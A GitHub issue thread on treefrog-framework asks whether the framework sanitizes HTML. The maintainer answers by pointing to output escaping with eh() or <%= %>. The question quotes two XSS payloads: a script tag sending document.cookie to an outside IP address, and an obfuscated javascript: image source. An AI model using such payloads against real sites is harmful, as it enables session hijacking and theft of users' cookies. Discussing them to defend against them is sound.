### ISSUE TITLE
Does it have html sanitization feature built-in?

### ISSUE THREAD

**Issue by shujaatak** [treefrogframework/treefrog-framework#241]
Can you please mention if treefrog-framework has html sanitization built-in or how one can achieve?

**Comment by treefrogframework** [comment]
See here.
http://www.treefrogframework.org/en/user-guide/security

Is it helpful?

**Comment by shujaatak** [comment]
Indeed it **is** helpful! 
What if I allow users to post their own content like blog post/article, How I would make sure the post doesn't contain malicious code yet render images, links, etc correctly?

**Comment by shujaatak** [comment]
Let suppose a user writes the following code in an article/comment:
`<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>`
which essentially hijack session cookie.
Or
`<IMG SRC=j&#X41vascript:alert('test2')>`
etc.
Now the question arise whether such XSS attacks can be avoided using treefrog-framework?

**Comment by treefrogframework** [comment]
Can you use this?
>   The eh() method or ‘<%= .. %>’ notation should be used for outputting values.

Then the code will be invalidated.
